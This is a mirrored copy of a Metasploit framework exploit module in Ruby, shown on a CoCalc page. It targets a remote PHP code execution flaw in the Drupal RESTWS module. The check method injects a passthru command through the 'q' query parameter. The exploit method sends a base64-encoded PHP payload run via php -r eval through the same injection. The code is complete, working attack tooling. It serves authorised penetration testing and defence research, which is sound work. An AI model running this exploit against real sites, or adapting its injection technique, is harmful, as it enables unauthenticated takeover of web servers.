CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/drupal_restws_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info={})

12
    super(update_info(info,

13
      'Name'           => 'Drupal RESTWS Module Remote PHP Code Execution',

14
      'Description'    => %q{

15
        This module exploits a Remote PHP Code Execution vulnerability in the

16
        Drupal RESTWS Module. Unauthenticated users can execute arbitrary code

17
        under the context of the web server user.

18


19
        RESTWS alters the default page callbacks for entities to provide

20
        additional functionality. A vulnerability in this approach allows

21
        an unauthenticated attacker to send specially crafted requests resulting

22
        in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7

23
        are affected by this issue.

24


25
        This module was tested against RESTWS 2.5 with Drupal 7.5 installed on

26
        Ubuntu Server.

27
      },

28
      'License'        => MSF_LICENSE,

29
      'Author'         =>

30
        [

31
          'Devin Zuczek',                        # discovery

32
          'Mehmet Ince <[email protected]>'  # msf module

33
        ],

34
      'References'     =>

35
        [

36
          ['URL', 'https://www.drupal.org/node/2765567']

37
        ],

38
      'Privileged'     => false,

39
      'Payload'        =>

40
        {

41
          'DisableNops' => true

42
        },

43
      'Platform'       => ['php'],

44
      'Arch'           => ARCH_PHP,

45
      'Targets'        => [ ['Automatic', {}] ],

46
      'DisclosureDate' => '2016-07-13',

47
      'DefaultTarget'  => 0

48
      ))

49


50
    register_options(

51
      [

52
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])

53
      ]

54
    )

55
  end

56


57
  def check

58
    r = rand_text_alpha(8 + rand(4))

59


60
    res = send_request_cgi(

61
      'method' => 'GET',

62
      'uri' => normalize_uri(target_uri.path, 'index.php'),

63
      'vars_get' => {

64
        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"

65
      }

66
    )

67


68
    if res && res.body.include?(r)

69
      Exploit::CheckCode::Vulnerable

70
    else

71
      Exploit::CheckCode::Safe

72
    end

73
  end

74


75
  def exploit

76
    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"

77


78
    send_request_cgi(

79
      'method' => 'GET',

80
      'uri' => normalize_uri(target_uri.path, 'index.php'),

81
      'vars_get' => {

82
        'q' => "taxonomy_vocabulary//passthru/#{cmd}"

83
      }

84
    )

85
  end

86
end

87


88